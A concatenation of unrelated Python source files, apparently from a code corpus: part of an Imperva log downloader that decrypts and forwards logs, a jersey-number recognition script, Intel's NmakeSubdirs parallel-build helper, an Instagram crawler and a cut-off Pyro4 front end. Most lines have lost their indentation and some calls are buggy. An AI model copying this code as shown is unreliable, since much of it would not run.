self.logger.error('Error sending log file to syslog server %s on port %s via protocol %s', self.config.SYSLOG_ADDRESS, self.config.SYSLOG_PORT, self.config.SYSLOG_PROTO)
if self.config.SAVE_LOCALLY == "YES":
            # append the decrypted content to a local file, closing the handle when done
            with open(self.config.PROCESS_DIR + filename, "a+") as local_file:
                local_file.write(decrypted_file)
"""
Decrypt a file content
"""
def decrypt_file(self, file_content, filename):
# each log file is built from a header section and a content section, the two are divided by a |==| mark
file_split_content = file_content.split(b"|==|\n")
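        # Informal sketch of the expected layout (inferred from the parsing below,
        # not from a format specification):
        #   key:<base64, RSA-encrypted AES key>      -- absent for unencrypted files
        #   publicKeyId:<id of the uploaded key pair>
        #   checksum:<md5 of the uncompressed log content>
        #   |==|
        #   <zlib-compressed (and possibly AES-CBC encrypted) log records>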
# get the header section content
file_header_content = file_split_content[0].decode('utf-8')
# get the log section content
file_log_content = file_split_content[1]
        # if the header has no "key:" entry (find() returns -1), the file is not encrypted
file_encryption_key = file_header_content.find("key:")
if file_encryption_key == -1:
# uncompress the log content
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(file_log_content)
# if the file is encrypted
else:
content_encrypted_sym_key = file_header_content.split("key:")[1].splitlines()[0]
# we expect to have a 'keys' folder that will have the stored private keys
self.logger.warning('Keys Dir: %s', os.path.join(self.config_path, "keys"))
if not os.path.exists(os.path.join(self.config_path, "keys")):
self.logger.error("No encryption keys directory was found and file %s is encrypted", filename)
raise Exception("No encryption keys directory was found")
# get the public key id from the log file header
public_key_id = file_header_content.split("publicKeyId:")[1].splitlines()[0]
# get the public key directory in the filesystem - each time we upload a new key this id is incremented
public_key_directory = os.path.join(os.path.join(self.config_path, "keys"), public_key_id)
# if the key directory does not exists
if not os.path.exists(public_key_directory):
self.logger.error("Failed to find a proper certificate for : %s who has the publicKeyId of %s", filename, public_key_id)
raise Exception("Failed to find a proper certificate")
# get the checksum
checksum = file_header_content.split("checksum:")[1].splitlines()[0]
# get the private key
private_key = bytes(open(os.path.join(public_key_directory, "Private.key"), "r").read(), 'utf-8')
try:
rsa_private_key = M2Crypto.RSA.load_key_string(private_key)
content_decrypted_sym_key = rsa_private_key.private_decrypt(base64.b64decode(bytes(content_encrypted_sym_key, 'utf-8')), M2Crypto.RSA.pkcs1_padding)
                # the IV must be bytes on Python 3; a 16-byte zero IV is used here
                uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(AES.new(base64.b64decode(bytearray(content_decrypted_sym_key)), AES.MODE_CBC, 16 * b"\x00").decrypt(file_log_content))
# we check the content validity by checking the checksum
content_is_valid = self.validate_checksum(checksum, uncompressed_and_decrypted_file_content)
if not content_is_valid:
self.logger.error("Checksum verification failed for file %s", filename)
raise Exception("Checksum verification failed")
except Exception as e:
self.logger.error("Error while trying to decrypt the file %s: %s", filename, e)
raise Exception("Error while trying to decrypt the file" + filename)
return uncompressed_and_decrypted_file_content
"""
Downloads a log file
"""
def download_log_file(self, filename):
# get the file name
filename = str(filename.rstrip("\r\n"))
try:
# download the file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + filename)
# if we received a valid file content
if file_content != "":
return "OK", file_content
# if the file was not found
else:
return "NOT_FOUND", file_content
except Exception:
self.logger.error("Error while trying to download file")
return "ERROR"
"""
Validates a checksum
"""
@staticmethod
def validate_checksum(checksum, uncompressed_and_decrypted_file_content):
m = hashlib.md5()
m.update(uncompressed_and_decrypted_file_content)
if m.hexdigest() == checksum:
return True
else:
return False
"""
Handle a case of process termination
"""
def set_signal_handling(self, sig, frame):
if sig == signal.SIGTERM:
self.running = False
self.logger.info("Got a termination signal, will now shutdown and exit gracefully")
"""
    Gets the numeric counter from a log file name
"""
def get_counter_from_file_name(self, file_name):
curr_log_file_name_arr = file_name.split("_")
return int(curr_log_file_name_arr[1].rstrip(".log"))
"""
****************************************************************
Helper Classes
****************************************************************
"""
"""
LastFileId - A class for managing the last known successfully downloaded log file
"""
class LastFileId:
def __init__(self, config_path):
self.config_path = config_path
"""
Gets the last known successfully downloaded log file id
"""
def get_last_log_id(self):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
# if the file exists - get the log file id from it
if os.path.exists(index_file_path):
with open(index_file_path, "r+") as index_file:
return index_file.read()
# return an empty string if no file exists
return ''
"""
Update the last known successfully downloaded log file id
"""
def update_last_log_id(self, last_id):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
with open(index_file_path, "w") as index_file:
# update the id
index_file.write(last_id)
index_file.close()
"""
Remove the LastKnownDownloadedFileId.txt file. Used to skip missing files.
"""
def remove_last_log_id(self):
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
if os.path.exists(index_file_path):
os.remove(index_file_path)
"""
Gets the next log file name that we should download
"""
def get_next_file_name(self, skip_files=0):
# get the current stored last known successfully downloaded log file
curr_log_file_name_arr = self.get_last_log_id().split("_")
# get the current id
curr_log_file_id = int(curr_log_file_name_arr[1].rstrip(".log")) + 1 + skip_files
# build the next log file name
new_log_file_id = curr_log_file_name_arr[0] + "_" + str(curr_log_file_id) + ".log"
return new_log_file_id
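    # Informal example (assuming the <prefix>_<counter>.log naming used above):
    # with a stored id of "123_45.log", get_next_file_name() returns "123_46.log"
    # and get_next_file_name(skip_files=1) returns "123_47.log".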
"""
Increment the last known successfully downloaded log file id
"""
def move_to_next_file(self):
self.update_last_log_id(self.get_next_file_name())
"""
LogsFileIndex - A class for managing the logs files index file
"""
class LogsFileIndex:
def __init__(self, config, logger, downloader):
self.config = config
self.content = None
self.hash_content = None
self.logger = logger
self.file_downloader = downloader
"""
Gets the indexed log files
"""
def indexed_logs(self):
return self.content
"""
Downloads a logs file index file
"""
def download(self):
self.logger.info("Downloading logs index file...")
# try to get the logs.index file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + "logs.index")
# if we got the file content
if file_content != "":
content = file_content.decode("utf-8")
# validate the file format
if LogsFileIndex.validate_logs_index_file_format(content):
self.content = content.splitlines()
self.hash_content = set(self.content)
else:
self.logger.error("log.index, Pattern Validation Failed")
raise Exception
else:
raise Exception('Index file does not yet exist, please allow time for files to be generated.')
"""
    Validates the log file name format of the entries inside the logs index file
"""
@staticmethod
def validate_logs_index_file_format(content):
        file_rex = re.compile(r"(\d+_\d+\.log\n)+")
if file_rex.match(content):
return True
return False
"""
Validates a log file name format
"""
@staticmethod
def validate_log_file_format(content):
        file_rex = re.compile(r"(\d+_\d+\.log)")
if file_rex.match(content):
return True
return False
"""
Config - A class for reading the configuration file
"""
class Config:
def __init__(self, config_path, logger):
self.config_path = config_path
self.logger = logger
"""
Reads the configuration file
"""
def read(self):
config_file = os.path.join(self.config_path, "Settings.Config")
if os.path.exists(config_file):
config_parser = configparser.ConfigParser()
config_parser.read(config_file)
config = Config(self.config_path, self.logger)
# Check for environment variables first, then load config values. Backwards compatibility with non-docker deployments
config.API_ID = os.environ.get('IMPERVA_API_ID', config_parser.get("SETTINGS", "APIID"))
config.API_KEY = os.environ.get('IMPERVA_API_KEY', config_parser.get("SETTINGS", "APIKEY"))
config.PROCESS_DIR = os.environ.get('IMPERVA_LOG_DIRECTORY', os.path.join(config_parser.get("SETTINGS", "PROCESS_DIR"), ""))
config.BASE_URL = os.environ.get('IMPERVA_API_URL', os.path.join(config_parser.get("SETTINGS", "BASEURL"), ""))
config.SAVE_LOCALLY = os.environ.get('IMPERVA_SAVE_LOCALLY', config_parser.get("SETTINGS", "SAVE_LOCALLY"))
config.USE_PROXY = os.environ.get('IMPERVA_USE_PROXY', config_parser.get("SETTINGS", "USEPROXY"))
config.PROXY_SERVER = os.environ.get('IMPERVA_PROXY_SERVER', config_parser.get("SETTINGS", "PROXYSERVER"))
config.SYSLOG_ENABLE = os.environ.get('IMPERVA_SYSLOG_ENABLE', config_parser.get('SETTINGS', 'SYSLOG_ENABLE'))
config.SYSLOG_ADDRESS = os.environ.get('IMPERVA_SYSLOG_ADDRESS', config_parser.get('SETTINGS', 'SYSLOG_ADDRESS'))
config.SYSLOG_PORT = os.environ.get('IMPERVA_SYSLOG_PORT', config_parser.get('SETTINGS', 'SYSLOG_PORT'))
config.SYSLOG_PROTO = os.environ.get('IMPERVA_SYSLOG_PROTO', config_parser.get('SETTINGS','SYSLOG_PROTO'))
config.USE_CUSTOM_CA_FILE = os.environ.get('IMPERVA_USE_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'USE_CUSTOM_CA_FILE'))
config.CUSTOM_CA_FILE = os.environ.get('IMPERVA_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'CUSTOM_CA_FILE'))
return config
else:
self.logger.error("Could Not find configuration file %s", config_file)
raise Exception("Could Not find configuration file")
"""
FileDownloader - A class for downloading files
"""
class FileDownloader:
def __init__(self, config, logger):
self.config = config
self.logger = logger
"""
    A method for getting the content of a destination URL
"""
def request_file_content(self, url, timeout=20):
# default value
response_content = ""
#https://github.com/imperva/incapsula-logs-downloader/pull/7
if self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "YES":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "NO":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "NO" and self.config.USE_CUSTOM_CA_FILE == "YES":
https = urllib3.PoolManager(ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
else: # no proxy and no custom CA file
https = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', timeout=timeout)
try:
#Download the file
auth_header = urllib3.make_headers(basic_auth='%s:%s' % (self.config.API_ID, self.config.API_KEY))
response = https.request('GET', url, headers=auth_header)
# if we get a 200 OK response
if response.status == 200:
self.logger.info("Successfully downloaded file from URL %s" % url)
# read the response content
response_content = response.data
            # if the file was not found (it may not have been generated yet)
elif response.status == 404:
self.logger.warning("Could not find file %s. Response code is %s", url, response.status)
return response_content
elif response.status == 401:
self.logger.error("Authorization error - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Authorization error")
elif response.status == 429:
self.logger.error("Rate limit exceeded - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Rate limit error")
else:
self.logger.error("Failed to download file %s. Response code is %s. Data is %s", url, response.status, response.data)
# close the response
response.close()
# return the content string
return response_content
except urllib3.exceptions.HTTPError as e:
            print('Request failed:', e)
            self.logger.error("An error has occurred while opening a connection to %s. %s", url, str(e))
raise Exception("Connection error")
# unexpected exception occurred
except Exception:
self.logger.error("An error has occur while making a open connection to %s. %s", url, traceback.format_exc())
raise Exception("Connection error")
if __name__ == "__main__":
# default paths
path_to_config_folder = "/etc/incapsula/logs/config"
path_to_system_logs_folder = "/var/log/incapsula/logsDownloader/"
# default log level
system_logs_level = "INFO"
# read arguments
try:
opts, args = getopt.getopt(sys.argv[1:], 'c:l:v:h', ['configpath=', 'logpath=', 'loglevel=', 'help'])
except getopt.GetoptError:
print("Error starting Logs Downloader. The following arguments should be provided:" \
" \n '-c' - path to the config folder" \
" \n '-l' - path to the system logs folder" \
" \n '-v' - LogsDownloader system logs level" \
" \n Or no arguments at all in order to use default paths")
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print('LogsDownloader.py -c <path_to_config_folder> -l <path_to_system_logs_folder> -v <system_logs_level>')
sys.exit(2)
elif opt in ('-c', '--configpath'):
path_to_config_folder = arg
elif opt in ('-l', '--logpath'):
path_to_system_logs_folder = arg
elif opt in ('-v', '--loglevel'):
system_logs_level = arg.upper()
if system_logs_level not in ["DEBUG", "INFO", "ERROR"]:
sys.exit("Provided system logs level is not supported. Supported levels are DEBUG, INFO and ERROR")
# init the LogsDownloader
logsDownloader = LogsDownloader(path_to_config_folder, path_to_system_logs_folder, system_logs_level)
# set a handler for process termination
signal.signal(signal.SIGTERM, logsDownloader.set_signal_handling)
try:
# start a dedicated thread that will run the LogsDownloader logs fetching logic
process_thread = threading.Thread(target=logsDownloader.get_log_files, name="process_thread")
# start the thread
process_thread.start()
while logsDownloader.running:
time.sleep(1)
process_thread.join(1)
except Exception:
sys.exit("Error starting Logs Downloader - %s" % traceback.format_exc())
|
Number_Detect.py
|
# -*- coding: utf-8 -*-
# @Time : 2021/1/29 17:22
# @Author : BINGO
# @School: Zhejiang University
# @Company: 竺星
# @FileName: Number_Detect.py
import threading, queue, time
from queue import Queue
from threading import Thread, currentThread
import os
from CalibrateTransfer.img_operation import ScreenSHot_batch
from CalibrateTransfer.data_preprocess import write_data_to_json_file, read_data_from_json_file_v2
import numpy as np
import torch.utils.data as data
import torch
import json
import shutil
from ReID_model.modeling import ReID_Model
from utils_BINGO.K_Means import k_means
from ReID_model.utils.dataset_loader import ReID_imgs_load_by_home_and_away
import logging
from utils.log import Log
from utils.timer import Timer
from utils.dir_related_operation import makedir_v1
import cv2
from SVHN.svhn import load_in_Svhn_model
from torchvision import transforms
from PIL import Image
from utils_BINGO.Number_Rectifier import Number_Rectifier
class SVHN_Predict():
def __init__(self,dir_root, ReIDCfg, Num_Pred_opt, vis, queueSize=1024):
self.dir_root = dir_root
self.dir_list = [d for d in os.listdir(self.dir_root) if os.path.isdir(os.path.join(self.dir_root, d))]
self.dir_list = sorted(self.dir_list, key=lambda x: int(x))
        # logger.info('Target directory is {}'.format(self.root_path))
self.datalen = len(self.dir_list)
self.Start_Index = 0
        # always define vis_path so later "if self.vis_path:" checks cannot raise AttributeError
        self.vis_path = vis
        # jersey-number rectifier; its parameters are adjusted according to the officials' report
self.Number_Rectifier = Number_Rectifier
self.batch_size = 60
        self.Num_Pred_opt = Num_Pred_opt  # parameters for the number recognition model
self.SVHN_predictor = load_in_Svhn_model(self.Num_Pred_opt)
        self.PreProcess_Q = Queue(maxsize=queueSize)  # input images are pre-processed here before number recognition
self.SVHN_Q = Queue(maxsize=queueSize)
self.transform = transforms.Compose([
transforms.Resize([54, 54]),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
])
self.height_threshold = 21
self.width_threshold = 12
        # load the ReID model
self.ReIDCfg = ReIDCfg
        self.num_cls = 4  # number of person categories on the field
self.logger = Log(__name__, 'SVHN_Predict').getlog()
def PreProcess_(self):
self.t_PreProcess = Thread(target=self.PreProcess, args=())
self.t_PreProcess.daemon = True
self.t_PreProcess.start()
def PreProcess(self):
'''
        Pre-process the images that need number recognition.
'''
self.logger.debug('The pid of SVHN_Predict.PreProcess() : {}'.format(os.getpid()))
self.logger.debug('The thread of SVHN_Predict.PreProcess() : {}'.format(currentThread()))
PreProcess_timer = Timer()
for dir_index in range(self.Start_Index, self.datalen):
            PreProcess_timer.tic()  # start timing
# self.logger.debug('PreProcess() ======================================== action {}'.format(dir_index))
this_dir = os.path.join(self.dir_root,self.dir_list[dir_index],'Target')
imgs_name_list= os.listdir(this_dir)
if len(imgs_name_list) <= 0:
self.PreProcess_Q.put((False, (dir_index, [])))
print('{} is empty'.format(this_dir))
continue
imgs_transfered_list = []
original_imgs = []
for img_name in imgs_name_list:
this_img_path = os.path.join(this_dir,img_name)
this_img = cv2.imread(this_img_path)
                # cv2.imread returns None when a read fails, so guard that case as well
                if this_img is None or this_img.size == 0:
print('dir_index : {}, img_name : {} is empty'.format(dir_index, img_name) )
continue
height, width, _ = this_img.shape
if height < self.height_threshold or width < self.width_threshold:
                    # the image is too small, so it is not added to the keypoint-detection queue
continue
img_transfered = Image.fromarray(this_img)
img_transfered = self.transform(img_transfered)
imgs_transfered_list.append(img_transfered)
original_imgs.append(this_img)
            # if none of the images met the requirements
if len(original_imgs) == 0:
self.PreProcess_Q.put((False, (dir_index, [])))
else:
imgs_transfered_list = torch.stack(imgs_transfered_list, dim=0)
self.PreProcess_Q.put((True, (dir_index, imgs_transfered_list, original_imgs)))
# self.logger.info('Calibrate_transfer.sub_img_generate() action {} consums {}s'.format(action_index,sub_img_generate_timer.toc()))
# self.logger.log(24, 'SVHN_Predict.PreProcess() action {} consums {}s'.format(dir_index, PreProcess_timer.toc()))
def Predict_(self):
self.t_Predict = Thread(target=self.Predict, args=())
self.t_Predict.daemon = True
self.t_Predict.start()
def Predict(self):
'''
        Use SVHN to predict jersey numbers on the pre-processed images.
'''
Predict_timer = Timer()
self.logger.debug( 'The pid of SVHN_Predict.Predict() : {}'.format(os.getpid()))
self.logger.debug( 'The thread of SVHN_Predict.Predict() : {}'.format(currentThread()))
Number_TrackingID_dict = {}
for dir_index in range(self.Start_Index, self.datalen):
            Predict_timer.tic()  # start timing
Predict_len = 0
dir_name = self.dir_list[dir_index]
PreProcess_Flag, PreResults = self.PreProcess_Q.get()
# self.logger.debug('Predict() ======================================== action {}'.format(action_index))
            if not PreProcess_Flag:
                # the input data is empty, nothing to predict
preNum = -1
else:
                # the input data is valid, read it
_, rectangle_imgs,original_imgs = PreResults
imgs_length = rectangle_imgs.size(0)
leftover = 0
if (imgs_length) % self.batch_size:
leftover = 1
num_batches = imgs_length // self.batch_size + leftover
if self.vis_path:
vis_dir = os.path.join(self.vis_path,'{}'.format(dir_name),'SVHN_Predict')
makedir_v1(vis_dir)
vis_dir_0 = os.path.join(self.vis_path, '{}'.format(dir_name), 'SVHN_Predict_Minus_one')
makedir_v1(vis_dir_0)
NumsArray = []
for j in range(num_batches):
input_imgs_j = rectangle_imgs[j*self.batch_size:min((j+1)*self.batch_size , imgs_length)]
length_logits_j, digits_logits_j = self.SVHN_predictor(input_imgs_j.cuda())
                    '''torch.max(dim=1) returns two tensors: the first holds the max values and the second their indices'''
                    length_predictions_j = length_logits_j.max(1)[1].cpu().tolist()
                    digits_predictions_j = [digit_logits.max(1)[1].cpu().tolist() for digit_logits in digits_logits_j]
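                    # length_predictions_j[i] is the predicted digit count for sample i;
                    # digits_predictions_j[k][i] is the predicted k-th digit of sample i,
                    # so a two-digit number is assembled below as 10 * digit0 + digit1.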
NumsArray_j = []
for Num_i in range(len(length_predictions_j)):
Number_len = length_predictions_j[Num_i]
if Number_len == 1:
Num = digits_predictions_j[0][Num_i]
NumsArray_j.append(Num)
elif Number_len == 2:
Num = digits_predictions_j[0][Num_i] * 10 + digits_predictions_j[1][Num_i]
NumsArray_j.append(Num)
elif Number_len == 0:
Num = -1
if self.vis_path:
                                # index by batch offset so file names (and the saved image) match across batches
                                cv2.imwrite(os.path.join(vis_dir_0, '{}_P{}.jpg'.format(j * self.batch_size + Num_i, Num)), original_imgs[j * self.batch_size + Num_i])
continue
else:
continue
if self.vis_path:
                            cv2.imwrite(os.path.join(vis_dir, '{}_P{}.jpg'.format(j * self.batch_size + Num_i, Num)), original_imgs[j * self.batch_size + Num_i])
NumsArray.extend(NumsArray_j)
Predict_len = len(NumsArray)
if Predict_len > 1:
# NumberArray range from 0 to 99.
# We need to count how many times does each number appear!
NumsArray = np.histogram(NumsArray, bins=100, range=(0, 100))[0]
preNum = np.argmax(NumsArray)
# if preNum == 10:
# print('wrong value')
preNum_count = NumsArray[preNum]
if np.where(NumsArray == preNum_count)[0].size > 1:
# if there are more than one number have the maximun counts, then return -1
# can sort by number classification scores.
preNum = -1
else:
preNum = -1
# 保存数据
# self.logger.log(24, 'SVHN_Predict.Predict action {} consums {}s'.format(action_index, Predict_timer.toc()))
self.logger.log(24,'dir_name {} Predict_len = {} Predict num = {} ============='.format(dir_name, Predict_len, preNum))
Number_TrackingID_dict[int(dir_name)] = int(preNum)
with open(os.path.join(self.vis_path,'Number_results.json'),'w') as f :
json.dump(Number_TrackingID_dict,f)
self.logger.log(24, '-----------------------------Finished SVHN_Predict.Predict() datalen = {}-----------------------------'.format(self.datalen))
if __name__ == '__main__':
from opt import OPT_setting
from Write_Config import readyaml
from easydict import EasyDict as edict
opt = OPT_setting().init()
Num_Pred_opt = edict(readyaml(opt.SvhnCfg))
ReIDCfg = edict(readyaml(opt.ReIDCfg))
dir_root = '/datanew/hwb/data/MOT/WestGroundALL/100-s-1/results_pose/ch01'
vis = '/datanew/hwb/data/MOT/WestGroundALL/100-s-1/Number_vis'
N_Predictor = SVHN_Predict(dir_root, ReIDCfg, Num_Pred_opt, vis)
N_Predictor.PreProcess_()
N_Predictor.Predict_()
    # wait for the processing threads to finish
N_Predictor.t_PreProcess.join()
    print('----------------Finished N_Predictor.t_PreProcess()----------------')
N_Predictor.t_Predict.join()
    print('----------------Finished N_Predictor.t_Predict() datalen = {}----------------'.format(
N_Predictor.datalen))
# os.kill(os.getpid(),signal.SIGKILL)
|
NmakeSubdirs.py
|
# @file NmakeSubdirs.py
# This script support parallel build for nmake in windows environment.
# It supports Python2.x and Python3.x both.
#
# Copyright (c) 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
#
# Import Modules
#
from __future__ import print_function
import argparse
import threading
import time
import os
import subprocess
import multiprocessing
import copy
import sys
__prog__ = 'NmakeSubdirs'
__version__ = '%s Version %s' % (__prog__, '0.10 ')
__copyright__ = 'Copyright (c) 2018, Intel Corporation. All rights reserved.'
__description__ = 'Replacement for NmakeSubdirs.bat on Windows; supports parallel build for nmake.\n'
cpu_count = multiprocessing.cpu_count()
output_lock = threading.Lock()
def RunCommand(WorkDir=None, *Args, **kwargs):
if WorkDir is None:
WorkDir = os.curdir
if "stderr" not in kwargs:
kwargs["stderr"] = subprocess.STDOUT
if "stdout" not in kwargs:
kwargs["stdout"] = subprocess.PIPE
p = subprocess.Popen(Args, cwd=WorkDir, stderr=kwargs["stderr"], stdout=kwargs["stdout"])
stdout, stderr = p.communicate()
message = ""
if stdout is not None:
message = stdout.decode(errors='ignore') #for compatibility in python 2 and 3
if p.returncode != 0:
raise RuntimeError("Error while execute command \'{0}\' in direcotry {1}\n{2}".format(" ".join(Args), WorkDir, message))
output_lock.acquire(True)
print("execute command \"{0}\" in directory {1}".format(" ".join(Args), WorkDir))
print(message)
output_lock.release()
return p.returncode, stdout
class TaskUnit(object):
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __eq__(self, other):
return id(self).__eq__(id(other))
def run(self):
return self.func(*self.args, **self.kwargs)
def __str__(self):
para = list(self.args)
para.extend("{0}={1}".format(k, v)for k, v in self.kwargs.items())
return "{0}({1})".format(self.func.__name__, ",".join(para))
class ThreadControl(object):
def __init__(self, maxthread):
self._processNum = maxthread
self.pending = []
self.running = []
self.pendingLock = threading.Lock()
self.runningLock = threading.Lock()
self.error = False
self.errorLock = threading.Lock()
self.errorMsg = "errorMsg"
def addTask(self, func, *args, **kwargs):
self.pending.append(TaskUnit(func, args, kwargs))
def waitComplete(self):
self._schedule.join()
def startSchedule(self):
self._schedule = threading.Thread(target=self.Schedule)
self._schedule.start()
def Schedule(self):
for i in range(self._processNum):
task = threading.Thread(target=self.startTask)
task.daemon = False
self.running.append(task)
self.runningLock.acquire(True)
for thread in self.running:
thread.start()
self.runningLock.release()
while len(self.running) > 0:
time.sleep(0.1)
if self.error:
print("subprocess not exit successfully")
print(self.errorMsg)
def startTask(self):
while True:
if self.error:
break
self.pendingLock.acquire(True)
if len(self.pending) == 0:
self.pendingLock.release()
break
task = self.pending.pop(0)
self.pendingLock.release()
try:
task.run()
except RuntimeError as e:
if self.error: break
self.errorLock.acquire(True)
self.error = True
self.errorMsg = str(e)
time.sleep(0.1)
self.errorLock.release()
break
self.runningLock.acquire(True)
self.running.remove(threading.currentThread())
self.runningLock.release()
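# Informal usage sketch (mirrors Run() below; directory and target names are
# illustrative only): queue one nmake invocation per sub-directory, then start
# the scheduler and wait for all workers to finish.
#
#   controller = ThreadControl(4)
#   for d in ("PeiLib", "DxeLib"):
#       controller.addTask(RunCommand, d, "nmake", "all")
#   controller.startSchedule()
#   controller.waitComplete()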
def Run():
curdir = os.path.abspath(os.curdir)
if len(args.subdirs) == 1:
args.jobs = 1
if args.jobs == 1:
try:
for dir in args.subdirs:
RunCommand(os.path.join(curdir, dir), "nmake", args.target, stdout=sys.stdout, stderr=subprocess.STDOUT)
except RuntimeError:
exit(1)
else:
controller = ThreadControl(args.jobs)
for dir in args.subdirs:
controller.addTask(RunCommand, os.path.join(curdir, dir), "nmake", args.target)
controller.startSchedule()
controller.waitComplete()
if controller.error:
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog=__prog__, description=__description__ + __copyright__, conflict_handler='resolve')
parser.add_argument("target", help="the target for nmake")
parser.add_argument("subdirs", nargs="+", help="the relative dir path of makefile")
parser.add_argument("--jobs", type=int, dest="jobs", default=cpu_count, help="thread number")
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
Run()
|
crawler.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import argparse
import json
import sys
from io import open
from threading import Thread
from elasticsearch_dsl import connections
from inscrawler import InsCrawler
from inscrawler.elastic import get_unchecked_profiles, get_unchecked_targets
from inscrawler.settings import override_settings
from inscrawler.settings import prepare_override_settings
from inscrawler.settings import settings
def usage():
return """
python crawler.py posts -u cal_foodie -n 100 -o ./output
python crawler.py posts_full -u cal_foodie -n 100 -o ./output
python crawler.py profile -u cal_foodie -o ./output
python crawler.py profile_script -u cal_foodie -o ./output
python crawler.py hashtag -t taiwan -o ./output
The default number for fetching posts via hashtag is 100.
"""
def get_posts_by_user(username, number, detail, debug):
if username:
ins_crawler = InsCrawler(has_screen=debug)
if settings.login:
ins_crawler.login()
return ins_crawler.get_user_posts(username, number, detail)
else:
pass
def get_profile(username):
ins_crawler = InsCrawler()
return ins_crawler.get_user_profile(username)
def get_profile_from_script(username):
    ins_crawler = InsCrawler()
    return ins_crawler.get_user_profile_from_script_shared_data(username)
def get_posts_by_hashtag(tag, number, debug):
ins_crawler = InsCrawler(has_screen=debug)
return ins_crawler.get_latest_posts_by_tag(tag, number)
def get_popular_users(starting_user, debug, threads_number):
if not threads_number:
threads_number = 4
users_list = get_unchecked_profiles(threads_number)
for hits in users_list:
ins_crawler = InsCrawler(has_screen=debug)
if settings.login:
ins_crawler.login()
Thread(target=ins_crawler.check_popular_profiles_elastic, args=(hits,)).start()
def check_targets(debug, threads_number):
if not threads_number:
threads_number = 4
targets_list = get_unchecked_targets(threads_number)
for hits in targets_list:
ins_crawler = InsCrawler(has_screen=debug)
if settings.login:
ins_crawler.login()
Thread(target=ins_crawler.check_targets, args=(hits,)).start()
def arg_required(args, fields=[]):
for field in fields:
if not getattr(args, field):
parser.print_help()
sys.exit()
def output(data, filepath):
out = json.dumps(data, ensure_ascii=False)
if filepath:
with open(filepath, "w", encoding="utf8") as f:
f.write(out)
else:
print(out)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Instagram Crawler", usage=usage())
parser.add_argument(
"mode", help="options: [posts, posts_full, profile, profile_script, hashtag, popular, target]"
)
parser.add_argument("-n", "--number", type=int, help="number of returned posts")
parser.add_argument("-i", "--instance", type=int, help="number of threads")
parser.add_argument("-u", "--username", help="instagram's username")
parser.add_argument("-t", "--tag", help="instagram's tag name")
parser.add_argument("-o", "--output", help="output file name(json format)")
parser.add_argument("--debug", action="store_true")
prepare_override_settings(parser)
args = parser.parse_args()
override_settings(args)
if settings.elastic:
connections.create_connection(hosts=['localhost'], timeout=20)
if args.mode in ["posts", "posts_full"]:
arg_required("username")
output(
get_posts_by_user(
args.username, args.number, args.mode == "posts_full", args.debug
),
args.output,
)
elif args.mode == "profile":
arg_required("username")
output(get_profile(args.username), args.output)
elif args.mode == "profile_script":
arg_required("username")
output(get_profile_from_script(args.username), args.output)
elif args.mode == "hashtag":
arg_required("tag")
output(
get_posts_by_hashtag(args.tag, args.number or 100, args.debug), args.output
)
elif args.mode == "popular":
# arg_required("username")
output(get_popular_users(args.username, args.debug, args.instance), args.output)
elif args.mode == "target":
output(check_targets(args.debug, args.instance), args.output)
else:
        print(usage())
|
frontend.py
|
#!/usr/bin/python3
""" User Client """
import json
import socketserver
import sys
import Pyro4
# TODO: work out what is throwing errors
# TODO: get server polling code to change server status if there is an outage.
class FrontEnd(object):
def __init__(self):
ns = Pyro4.locateNS()
self.server_uris = [ns.lookup("OrderManager1"), ns.lookup("OrderManager2"), ns.lookup("OrderManager3")]
self.serverlist = []
for uri in self.server_uris:
self.serverlist.append(Pyro4.Proxy(uri))
self.server = self.serverlist[0]
self.server.set_primary_state(True)
# update server lists
for s in self.serverlist:
s.set_servers(self.server_uris)
print(self.server_uris)
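    # Requests are expected to arrive as JSON objects of the form
    #   {"action": "ADD" | "DELETE" | "HISTORY", "userid": <user id>, "data": <payload>}
    # (informal description inferred from process_command below, not a formal spec).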
def process_command(self, data):
print("Frontend data: ", data)
command = data['action']
userid = data['userid']
input = data['data']
if not userid:
return "No USERID specified"
if command == "ADD":
print("Running Action Frontend")
items_to_order = input.split(',')
if len(items_to_order) > 3 or len(items_to_order) == 0:
return "Must enter at least 1 item, and no more than 3."
# deal with batch stuff, to
results = self.server.place_order(userid, items_to_order)
# todo check length to make sure a server is online.
return str(results)
elif command == "DELETE":
print("running delete front end")
del_index = input
results = self.server.cancel_order(userid, del_index)
# todo check results to ensure things are fine :D
return str(results)
elif command == "HISTORY":
print("Running History frontend")
results = self.server.get_order_history(userid)
print("Frontend results: ", results)
# todo remove batch processing for this (no CUD needed, only R).
return str(results)
else:
return "Command not found. Please try again"
class MyServer(socketserver.BaseRequestHandler):
def handle(self):
server = FrontEnd()
data = self.request.recv(1024).strip()
data = data.decode()
data_dict = json.loads(data)
res = server.process_command(data_dict)
